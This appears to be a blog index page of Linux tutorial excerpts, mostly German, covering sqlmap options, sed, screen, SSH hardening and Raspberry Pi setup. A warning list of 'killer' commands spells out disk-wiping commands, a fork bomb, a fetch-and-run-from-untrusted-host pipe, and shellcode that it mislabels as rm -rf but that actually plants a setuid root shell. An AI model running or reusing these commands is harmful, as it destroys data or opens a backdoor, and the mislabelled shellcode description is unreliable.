Linux

HowTo: sqlmap

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev https://github.com/sqlmapproject/sqlmap/wiki/Introduction root@kali:~# sqlmap -h Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to set the target(s) -d DIRECT Direct connection to the database -u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1") -l LOGFILE Parse targets from Burp or WebScarab proxy logs -m BULKFILE Scan multiple targets enlisted in a given textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target URLs -c CONFIGFILE Load options from a configuration INI file Request: These options can be used to specify how to connect to the target URL --data=DATA Data string to be sent through POST --param-del=PDEL Character used for splitting parameter values --cookie=COOKIE HTTP Cookie header --cookie-del=CDEL Character used for splitting cookie values --load-cookies=L.. File containing cookies in Netscape/wget format --drop-set-cookie Ignore Set-Cookie header from response --user-agent=AGENT HTTP User-Agent header --random-agent Use randomly selected HTTP User-Agent header --host=HOST HTTP Host header --referer=REFERER HTTP Referer header --headers=HEADERS Extra headers (e.g. "Accept-Language: frnETag: 123") --auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM) --auth-cred=ACRED HTTP authentication credentials (name:password) --auth-private=A.

Continue reading

Importieren von MySQL dumpfile - SQL datafile in die database FAQ

FAQ Frage: Wie kann man eine MySQL dumpfile in eine database importieren? Was macht man mit einer data.sql Sicherungsdatei von meinem alten Webserver? FAQ Antwort: Man kann einfach die MySQL Daten mit einem mysql Kommando wiederherstellen. Dazu muss man sich einfach in das System per Putty oder ssh einlogen und den mysql Befehl ausführen: Folgenden Befehl in der Shell eingeben um sich mit dem Host zu verbinden: $ ssh [email protected] Um die SQL Daten Datei nun zu importiern tippt man folgendes: $ mysql -u username -p -h localhost DataBaseName < data.sql Falls man einen Dedicated Database Server, ersetzt man localhost name mit dem Server Namen oder der IP address: $ mysql -u username -p -h 209.54.1.66 databasename < data.sql Oder man benutzt den Hostname wie z.B. mysql.hosting.com $ mysql -u username -p -h mysql.hosting.com database-name < data.sql Wenn man nicht weiß wie die Database heißt, oder der Name in in die SQL dump Datei eingebunden ist, kann man folgendes versuchen: $ mysql -u username -p -h 209.54.1.66 < data.sql

Continue reading

Installation der deutschen Sprachdatei für Wordpress

Als erstes musst du dir die Datei de_DE.mo besorgen. Aktuelle Version findest du hier: Deutsche Sprachdatei downloaden Beachte: Die deutsche Sprachdatei kann nicht direkt bearbeitet werden Neues Verzeichnis /languages erstellen Im Verzeichnis wp-content muss das Verzeichnis /languages erstellt werden. /home/wp-content/languages Deutsche Sprachdatei in Wordpress Verzeichnis kopieren In das neu erstellte Verzeichnis /languages die Datei de_DE.mo kopieren. /home/wp-content/languages/de_DE.mo Wordpress Konfigurationsdatei wp-config.php bearbeiten Die Datei wp-config.php aus Hauptverzeichnis öffnen mittels eines Linus Editors wie mcedit oder vi define ('WPLANG', ''); Jetzt de_DE eintragen, das sollte dann so aussehen: define ('WPLANG', 'de_DE'); Die Datei in Hauptverzeichnis laden /home/wp-config.php Die Datei de_DE.mo kann auch einen anderen Namen haben (z.B. de.mo oder wp-deutsch.mo) In jedem Fall in der Datei wp-config.php den gleichen Namen verwenden

Continue reading

Linux Terminal-multiplexer screen HowTo

Was ist Screen eigentlich? screen ist ein sogenannter “Terminal-multiplexer”. screen kann in einem Terminal ausgeführt werden (XTerm, gnome-terminal, Putty oder ssh-konsole usw.) und benötigt somit keinen X-Server. Der User hat die Möglichkeit mehrere Programme auszuführen und zwischen diesen hin und her zuwechseln ohne mehrere Terminals geöffnet zu haben. screen ist ein nettes Tool, um mit mehreren Personen gemeinsam auf einem Bildschirm (engl. “screen”) zu arbeiten, bzw. in einem Terminal (ssh usw.). Man kann so z.B. jemand beim Einstellen zuschauen. Man kann z.B. in einem Screenfenster mit mc das Dateien kopieren, in einem anderen mittels BitchX chatten und in einem dritten mit lynx im Internet surfen. Dies gilt für alles was sich in einem Linux-Terminal ausführen lässt und macht screen zu einem sehr mächtigem Linux Tool. Sobald ihr screenerfolgreich installiert habt, startet ihr es mit dem Kommando "screen" in einem Linux-Terminal eurer Wahl. Es erwartet euch dort eine ganz normale Linux-Shell. Wichtigsten Screen-Befehle Befehl Kommando Beschreibung [Strg + a] ? help -> Zeigt den eingebauten Hilfebildschirm [Strg + a] 0 -> Schaltet zum Bildschirm 0 [Strg + a] 9 -> Schaltet um auf Bildschirm 9 [Strg + a] A title -> Erlaubt dem User, dem aktuellen Bildschirm einen Namen zu geben.

Continue reading

Raspberry Pi: Statische/Feste IP-Adresse vergeben

Der Raspberry Pi bekommt im Normalfall im internen Netzwerk mittels des DHCP-Servers des Routers automatisch eine IP zugewiesen. Es gibt jedoch den Fall, dass der Router immer wieder eine andere IP-Adresse an den Raspberry Pi vergibt, sodass man nach jedem Neustart nachsehen muss, welche IP-Adresse der Raspberry Pi nun hat. Diesem Problem kann man mit dem Avahi Daemon für Bonjour begegnen, oder man weist den Raspberry Pi an, immer dieselbe IP-Adresse anzufordern. Alternativ kann man manche Router auch anweisen immer dieselbe IP-Adresse zu vergeben. Da dies jedoch nicht bei allen Routern einfach funktioniert, erkläre ich im Folgenden, wie man den Raspberry Pi dazu anweist, sich immer dieselbe IP-Adresse zuteilen zu lassen. Voraussetzung: Raspbian oder vergleichbare Distribution installiert Step 1 - Ip herausfinden Zunächst müssen wir die Gateway herausfinden. Dies ist die Adresse unter der in eurem Netzwerk euer Router ansprechbar ist. Diese können wir mittels folgendem Kommando herausfinden. Wir nehmen dabei die IP-Adresse aus der Spalte Gateway, die nicht 0.0.0.0 entspricht. Bei mir lautet diese 192.168.178.1. netstat -r -n Step 2 - interfaces konfigurieren Wir bearbeiten die Datei /etc/network/interfaces indem wir den ersten Codeblock durch den zweiten ersetzen. Dabei ersetzen wir die IP-Adresse in der Zeile gateway durch die soeben herausgefundene Gateway Adresse.

Continue reading

RaspberryPi als 3G / WIFI Gateway

Raspberry Pi as a 3g (Huawei E303) wireless (Edimax ESet up the Raspberry Pi as a wireless router using the Raspbian OS. The internet connection will be provided by a Huawei E303 USB 3g dongle on the safaricom network in Kenya, though the setup should be similar on most Huawei dongles and 3g networks. The wireless access point will be provided by an Edimax Nano USB Wifi adapter. The USB ports of the Pi seem to struggle to provide the power for a 3g dongle, so a powered USB hub is necessary. After a lot of reading and messing around, I’ve come up with a step by step guide for setting up my Pi as a wireless internet router. I use this every time I make a fresh setup of Raspbian, which is a fairly regular event. Stumbling round my latest install like a drunken elephant, it never takes me long to screw something up so badly that it’s easier just to start from scratch. As such, this guide assumes that the Raspbian operating system is ‘fresh’. It has been tested with the 2012-12-16 release - as soon as I have the time free, I’ll update the guide for the newest release.

Continue reading

SED Onliner

ZEILEN-ABSTÄNDE: # Doppelter Zeilenvorschub sed G # Doppelter Zeilenabstand für Dateien, die Leerzeilen enthalten. # Die Ausgabe sollte keine zwei aufeinander folgenden Leerzeilen enthalten. sed '/^$/d;G' # Dreifacher Zeilenvorschub sed 'G;G' # Doppelter Zeilenvorschub rückgängig machen # (Annahme: jede zweite Zeile ist leer) sed 'n;d' # Füge eine Leerzeile über jeder Zeile ein, die "regex" enthält sed '/regex/{x;p;x;}' # Füge eine Leerzeile unter jeder Zeile ein, die "regex" enthält sed '/regex/G' # Füge eine Leerzeile über und unter jeder Zeile ein, die "regex" enthält sed '/regex/{x;p;x;G;}' Nummerierung # Nummeriere alle Zeilen (linksbündig). Der Tabulator anstelle von Leerzeichen # erhält den Rand. (siehe auch die Bemerkung zu '\\t' am Ende dieser Datei) sed = filename | sed 'N;s/\\n/\\t/' # Nummeriere alle Zeilen (Zahl rechtsbündig in linker Spalte) sed = filename | sed 'N; s/^/ /; s/ \*\\(.\\{6,\\}\\)\\n/\\1 /' # Nummeriere alle Zeilen, aber die Nummern von Leerzeilen werden nicht ausgegeben. sed '/./=' filename | sed '/./N; s/\\n/ /' # Zeilen zählen (Nachahmung von "wc -l") sed -n '$=' TEXT UMWANDLUNG UND ERSETZUNG: # IN EINER UNIX UMGEBUNG: Wandle DOS Zeilenvorschübe (CR/LF) in das Unix-Format. sed 's/.$//' # Annahme: Alle Zeilen enden mit CR/LF sed 's/^M$//' # Bei bash/tcsh: Ctrl-V dann Ctrl-M sed 's/\\x0D$//' # für ssed, gsed 3.

Continue reading

Server Zertifikate erstellen und Signieren

Wenn Sie im WWW einen Serverdienst aufsetzen wollen, welcher verschlüsselte SSL oder TLS-Verbindungen anbietet. HTTPS POP3S IMAPS LDAPS SMTP mit TLS Um eine mit SSL/TLS abgesicherte Verbindung anzubieten, benötigen Sie jedoch ein Serverzertifikat. Dieses muss von einer Zertifizierungsstelle (Certification Authority oder kurz CA) signiert sein. Ein gültiges Serverzertifikat, welches von einer offiziellen Zertifikations-Stelle signiert ist, ist leider nicht kostenlos. Meist werden jährliche Kosten in Höhe hunderten von Euros fällig. Unter Linux kann man mit Bordmitteln eine eigene CA aufsetzen und ein selbst Zertifikate erstellen und signieren. Das ist ein Vorgang von wenigen Minuten. Der einzige Unterschied zu einem von einer anerkannten Stelle signierten Zertifikat ist, dass der Client (Browser, Email-Programm, usw.) eine Warnung ausgeben wird, dass er die CA nicht kennt. Der Benutzer muss dann einmal bestätigen und kann das Zertifikat trotzdem akzeptieren. Aber auch dies kann man umgehen, indem man kostenlos Mitglied bei CAcert wird, und so kostenlos an Server-Zertifikate kommt. OpenSSL installieren Für die Verwaltung der Zertifikate und im übrigen auch für die Verschlüsselung der Verbindungen mit SSL und TLS kommt unter Linux fast immer OpenSSL zum Einsatz. Meist ist dieses Packet auf Ihrem Server bereits vorinstalliert. Wenn nicht, müssen Sie das Paket openssl nachinstallieren. Erstellen der CA Legen Sie zunächst ein Verzeichnis an, in dem Sie das Zertifikat ablegen wollen.

Continue reading

TeamSpeak 3 Linux Server installieren

TS 3 Server unter Linux installieren In diesem HowTo wird erklärt wie man einen TeamSpeak 3 Server auf einem Linux Server installiert. 1.) Grundlagen / Vorbereitung der Installation Benötigte Programme: Putty (SSH Windows Client) auf dem Windows Rechner Screen auf dem Linux Server Teamspeak 3 Beta bringt keinen eigenen Daemon mit. Das heißt keinen Dienst bei dem der TS3 im Hintergrund laufen kann. Dies kann man aber mit Hilfe von Screen machen. Screen ist eine Art Fenstermanager für die SSH-Shell. Screen richtet sozusagen eine weitere im Hintergrund laufende Shell ein, eine sogenannte Screen Session. Und genau in dieser Session können wir jetzt den TS3 Server im Hintergrund laufen lassen. Sollte Screen auf dem Linux Rechner nicht installiert sein: bei Kubuntu, Ubuntu sowie Debian: apt-get install screen(ggf. noch die Anwendungen zum entpacken installieren:) apt-get install bzip2 apt-get install tar bei Suse mittels yast im Menü Software bei CentOS z.B.yum install screen Zur Installation wird anfangs eine Verbindung über Putty herstellen und als root Benutzer einloggt Hinweis: Es ist aus Sicherheitsgründen ratsam für TeamSpeak 3 (TS3) einen eigenen Nutzer zu erstellen und es nicht als Root laufen zu lassen. Hierfür gibt es verschiedene Möglichkeiten. Im Anschluß werden zwei einfache Methoden erklärt: Mittels dem Programm yast (nur möglich wenn es sich um einen Suse Linux Server handelt) Mittels des Linux Befehls useradd (auf jedem Linux Server möglich) a.

Continue reading

The Top Android Apps for hacking

Here we have in no particular order the top apps for hacking using an android smartphone. 1. SpoofApp: SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2021. 2. Andosid: The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 3. Faceniff: Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks. 4. Nmapper: (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses. 5. Anti-Android Network Toolkit: zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button.

Continue reading

Top 10 VPN Service providers

Virtual Private Network -VPN is a network technology which links the private network over internet using encryption methods. VPN is generally preferred by corporates, educational institutions, Government agencies and private citizens to facilitate easy access of remote users to secured private networks. VPN is economical as it is much cheaper when compared to private networks, it provides flexibility, not only that VPN users can maintain their anonymity as well as protect themselves from being snooped. VPN works on 4 protocols: IP security (IPSec): IPSec utilizes two methods to encrypt its user’s data :a) transport mode or b) tunneling mode. Transport mode means encryption of message within the data packet also termed as Payload. Tunneling mode means encryption of the entire data packet. Point-To-Point Tunneling Protocol (PPTP): This is the most widely used protocol; PPTP uses the tunneling method wherein PPTP stores data within the PPP packets which are further stored inside the IP packets which are transported to their destination. Layer 2 Tunneling Protocol (L2TP): It works on two major features: L2TP Access Concentrator (LAC) and L2TP Network Server (LNS). LAC: this is a device which terminates the call and LNS: this authenticates the PPP packets as seen earlier in the PPTP.

Continue reading

Top10 Linux Killer Befehle

Top 10 Killer Kommandos - Linux Befehle, die für Ihren Dateien oder sogar Ihr gesamtes Betriebssystem absolut tödlich verlaufen können. Um dieses gefährliche Szenario zu vermeiden, habe hier eine Liste der Top-Ten Linux Killer-Befehle, die Sie unbedingt vermeiden sollten. 1.Code: rm -rf / Dieser Befehl wirkt rekursiv und löscht auf einen Schlag gewaltsam alle Dateien im Root-Verzeichnis. rm-rf / funktioniert allerdings nicht mehr mit den meisten neueren Distributionen. Auch jetzt sind die meisten großen Distributionen (Ubuntu, Fedora, openSUSE, Mandriva) immun dagegen 2.Code: char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; Dies ist die Hex-Version von [rm-rf /] und kann selbst erfahrene Linux-Benutzer täuschen 3.Code: mkfs.ext3 /dev/sda Dieses Kombination formatiert bzw. wiped alle Dateien des Geräts nach dem Befehl mkfs 4.Code: :(){:|:&};: Bekannt als forkbomb, sorgt dieser Befehl dafür, dass das System eine große Anzahl von Prozessen ausführt, solange bis es dann einfriert. Dies kann oft dazu führen, dass die Daten zerstörrt bzw. beschädigt werden 5.Code: any_command > /dev/sda Mit diesem Befehl werden Roh-Daten auf das Block-Gerät geschrieben und kann in der Regel das Dateisystem zerstören, was insgesamt den Verlust von Daten bedeutet. 6.Code: wget http://some\_untrusted\_source -O- | sh

Continue reading

Tutorial: Top 20 OpenSSH Server Security Tipps

OpenSSH ist die Implementierung des SSH-Protokolls. OpenSSH ist für Remote Login empfohlen, das Erstellen von Backups, Remote-File-Transfer per SCP oder SFTP, und vieles mehr. SSH ist ideal, um die Vertraulichkeit und Integrität von Daten zwischen zwei Netzwerken und Systemen austauschen. Allerdings ist der Hauptvorteil Server-Authentifizierung, durch den Einsatz von Public-Key-Kryptographie. Von Zeit zu Zeit gibt es Gerüchte über OpenSSH Zero-Day-Exploit. Hier sind ein paar Dinge, die Sie zu zwicken, um OpenSSH-Server-Sicherheit zu verbessern. Die Default Config Files und der SSH Port /etc/ssh/sshd_config - OpenSSH server configuration file. /etc/ssh/ssh_config - OpenSSH client configuration file. ~/.ssh/ - Users ssh configuration directory. ~/.ssh/authorized_keys or ~/.ssh/authorized_keys - Lists the public keys (RSA or DSA) that can be used to log into the user’s account /etc/nologin - If this file exists, sshd refuses to let anyone except root log in. /etc/hosts.allow and /etc/hosts.deny : Access controls lists that should be enforced by tcp-wrappers are defined here. SSH default port : TCP 22 Tipp Nr. 01: OpenSSH Server Deaktivieren Laptops und Workstationen funktionieren auch ohne OpenSSH-Server. Wenn Sie nicht mit Remote Login und einer Dateiübertragungsfunktionen per SSH arbeiten, deaktivieren und entfernen Sie den sshd-Server. RHEL / Fedora / CentOS Linux-Benutzer deaktivieren und entfernen den openssh-server mit dem yum Befehl:

Continue reading

Überprüfen ob ein Prozess aktiv ist

Das Standard-Tool zur Anzeige laufender Prozesse ist ja eigentlich ps. Um damit aber schnell zu erkennen, ob ein Prozess mit einem bestimmten Namen läuft und wie die Prozess-ID (PID) lautet, müssen Sie ps schon mit grep verketten, das alle nicht zutreffenden Prozesse aus der Antwort ausfiltert. Mit pgrep ist das dagegen ganz leicht: Einfach den Prozessnamen als Parameter angeben und es liefert die PIDs aller Prozesse zurück, bei denen die angegebene Zeichenfolge im Namen vorkommt. Es gibt noch zwei interessante Zusatzparameter für pgrep. So finden Sie zum Beispiel heraus, ob der Beagle-Dämon für den User “uwe” läuft: pgrep -u uwe beagled Um statt der Prozess-ID den Namen als Antwort zu erhalten, verwenden Sie den Parameter -l. So erhalten Sie zum Beispiel die Namen aller aktiver Prozesse, die mit top zu tun haben: pgrep -l top

Continue reading

Unix Sed Tutorial: Advanced Sed Substitution Examples

Sed Substitution Delimiter As we discussed in our previous post, we can use the different delimiters such as @ % | ; : in sed substitute command. Let us first create path.txt file that will be used in all the Beispielen mentioned below. cat path.txt /usr/kbos/bin:/usr/local/bin:/usr/jbin:/usr/bin:/usr/sas/bin /usr/local/sbin:/sbin:/bin/:/usr/sbin:/usr/bin:/opt/omni/bin: /opt/omni/lbin:/opt/omni/sbin:/root/bin Beispiel 1 sed @ delimiter: Substitute /opt/omni/lbin to /opt/tools/bin When you substitute a path name which has ‘/’, you can use @ as a delimiter instead of ‘/’. In the sed Beispiel below, in the last line of the input file, /opt/omni/lbin was changed to /opt/tools/bin. sed 's@/opt/omni/lbin@/opt/tools/bin@g' path.txt /usr/kbos/bin:/usr/local/bin:/usr/jbin/:/usr/bin:/usr/sas/bin /usr/local/sbin:/sbin:/bin/:/usr/sbin:/usr/bin:/opt/omni/bin: /opt/tools/bin:/opt/omni/sbin:/root/bin Beispiel 2 sed / delimiter: Substitute /opt/omni/lbin to /opt/tools/bin When you should use ‘/’ in path name related substitution, you have to escape ‘/’ in the substitution data as shown below. In this sed Beispiel, the delimiter ‘/’ was escaped in the REGEXP and REPLACEMENT part. sed 's/\\/opt\\/omni\\/lbin/\\/opt\\/tools\\/bin/g' path.txt /usr/kbos/bin:/usr/local/bin:/usr/jbin/:/usr/bin:/usr/sas/bin /usr/local/sbin:/sbin:/bin/:/usr/sbin:/usr/bin:/opt/omni/bin: /opt/tools/bin:/opt/omni/sbin:/root/bin Sed ‘&’ Get Matched String The precise part of an input line on which the Regular Expression matches is represented by &, which can then be used in the replacement part. Beispiel 1 sed & Usage: Substitute /usr/bin/ to /usr/bin/local sed 's@/usr/bin@&/local@g' path.txt /usr/kbos/bin:/usr/local/bin:/usr/jbin/:/usr/bin/local:/usr/sas/bin /usr/local/sbin:/sbin:/bin/:/usr/sbin:/usr/bin/local:/opt/omni/bin: /opt/omni/lbin:/opt/omni/sbin:/root/bin In the above Beispiel ‘&’ in the replacement part will replace with /usr/bin which is matched pattern and add it with /local.

Continue reading

Use Wireshark on a DD-WRT

Earlier today I needed to find the quickest and easiest way to monitor all traffic to and from a specific device on my network. The goal was to see how much bandwidth based on a specific amount of time that the device was using. My initial hope was that I could configure port monitoring on my WRT54G running DD-WRT firmware however I quickly found out this is not an option. I eventually settled on adding a couple iptables commands that would send all traffic destined for or sourced from a specific IP address to another IP address. Follow the directions below to add the iptables commands to a router running DD-WRT firmware and then to capture the traffic on a computer running Wireshark. Configure Port Monitoring On WRT54G Running DD-WRT Firmware: First off I want to be clear that this is not technically port monitoring but I have added it in this way so others searching for the same functionality as I was will be able to find this solution. This solution is not limited to a Linksys WRT54G nor to DD-WRT for that matter but the requirement would be that it is a router type device using iptables for firewall rules.

Continue reading

10 nützliche Console Tools für Linux User

In diesem Tutorial habe ich 10 sehr nützliche Linux Konsolen Programme zum Thema Monitoring zusammengefasst: atop ccze dstat findmnt ncdu nmon saidar slurm ss w xkill Table of Contents w nmon ncdu slurm findmnt dstat ss ccze ranwhen more w Zeigt wer gerade am System angemeldet ist und welche Prozesse er ausführt. w Für Hilfe: w -hn Für den aktuellen Benutzer: w <username> nmon Nmon oder Nigel’s monitor ist ein Tool welches die Performance Informationen des Systems darstellt. apt-get install nmon nmon nmon kann Infos Dumps vom Netzwerk, CPU, Speicher oder Festplatten Auslastung erstellen. nmon cpu info (drücke c-Taste) nmon network info (drücke n-Taste) nman disk info (drücke d-Taste) ncdu Das Command Line Werkzeug nsdu ist eine Cursor basierte Version von du. Dieses Kommando wird verwenden um die Festplatten Nutzung der Verzeichnisse darzustellen. apt-get install ncdu ncdu / Ausgabe: Das Drücken der Taste n sortiert nach Name - das Drücken der Taste s sortiert nach Dateigröße (size = default) slurm Ein Konsolen Tool zum Bandweiten Monitoring von Netzwerk Interfaces. Die Darstellung erfolgt in ASCII basierenden Grafiken. apt-get install slurm Beispiele: slurm -i <interface> slurm -i eth1 Optionen Press l to display lx/tx led. press c to switch to classic mode.

Continue reading

150+ Vim Befehle die jeder Vim Coder kennen sollte

Seit etwa den 70er Jahren ist vi und vim zu den beliebtersten Text Editoren. Die folgende Sammlung enthält eine Liste von mehr als Hundert teils sehr nützlichen vim Kommandos. Allgemein :e filename Öffnet eine neue Datei. Sie können die Tab-Taste für die automatische Dateinamensvervollständigung genauso wie an der Shell-Eingabeaufforderung.nutzen. :w Speichern Sie die Änderungen in einer Datei. Wenn Sie keinen Dateinamen angeben, speichert Vim als Dateiname Sie. Für die Speicherung der Datei unter einem anderen Namen, geben Sie den Dateinamen ein. :q Wenn nicht gespeicherte Änderungen haben, weigert sich Vim vor der Beendigung. :q! Beenden ohne zu speichern :x Fast das gleiche wie :wq - die Datei speichern und verlassen, falls Sie Änderungen an der Datei vorgenommen haben. Wenn Sie keine Änderungen an der Datei vorgenommen haben, beendet sich Vim ohne die Datei zu schreiben. :sav filename Speichert die Datei als Dateinamen . Wiederholt die letzte Änderung die im Normal Mode gemacht wurde Wiederholt 5 mal die letzte Änderung im Normal Mode Shift+ZZ Alternative Art und Weise um zu speichern und Vim zu beenden :wq Schreiben der Datei und Exit Bewegung in Dateien k or Up Arrow move the cursor up one line j or Down Arrow move the cursor down one line

Continue reading

20 interessante Sysstat Befehle zum Performance Monitoring

Heute werden ich ein paar praktisch interessante Beispiele zu den Linux Tools mpstat, pidstat, iostat und sar zeigen, welche einem z.B. helfen können einen Fehler zu finden. Es gibt verschiedene Optionen um diese Werkzeuge zu verwenden. Damit will ich sagen, das man Kommandos manuell mit verschiedenen Optionen für viele verschiedene Tätigkeiten verwenden kann. Oder man baut sich je nach Anforderungen ein angepasstes shell script. Es ist ja bekannt, dass Sysadmins meist ein wenig faul sind, weswegen Sie ständig nach einfacheren Wegen suchen um die Dinge möglichst einfach und unkompliziert zu lösen. 1.) mpstat – Processor Statistiken Verwendet man den mpstat Befehl ohne Option, so wird der globale Durchschnitt aller CPU Aktivitäten angezeigt. root@linux~ $ mpstat Linux 3.12.0-25-generic (lxu.io) Monday 01 September 2015 _i686_ (4 CPU) 12:23:57 IST CPU %usr %nice %sys %iowait %irq %soft %steal %guest %gnice %idle 12:23:57 IST all 37.35 0.01 4.72 2.96 0.00 0.07 0.00 0.00 0.00 54.88 2.) Verwendet man mpstat mit der Option "-P" (Prozessornummer) und “ALL” so werden Statistiken über alle CPUs angezeigt. Die Anzeige startet dabei bei 0. 0 Ist damit der erste Wert root@linux~ $ mpstat -P ALL Linux 3.12.0-25-generic (lxu.io) Monday 01 September 2015 _i686_ (4 CPU) 12:29:26 IST CPU %usr %nice %sys %iowait %irq %soft %steal %guest %gnice %idle 12:29:26 IST all 37.

Continue reading

20 Linux CLI Tips

You making most out of the Linux? There are lots of helpful features which appears to be Tips and Tricks for many of Linux Users. Sometimes Tips and Tricks become the need. It helps you get productive with the same set of commands yet with enhanced functionality. Here we are starting a new series, where we will be writing some tips and tricks and will try to yield as more as we can in small time. 0x01. history To audit the commands we’d run in past, we use history command. Here is a sample output of history command. # history Obvious from output, the history command do not output the time stamp with the log of last executed commands. Any solution for this? Yeah! Run the below command. HISTTIMEFORMAT="%d/%m/%y %T " # history If you want to permanently append this change, add the below line to ~/.bashrc. export HISTTIMEFORMAT="%d/%m/%y %T " and then, from terminal run, source ~/.bashrc Explanation of commands and switches. history – GNU History Library HISTIMEFORMAT – Environmental Variable %d – Day %m – Month %y – Year %T – Time Stamp source – in short send the contents of file to shell .bashrc – is a shell script that BASH runs whenever it is started interactively.

Continue reading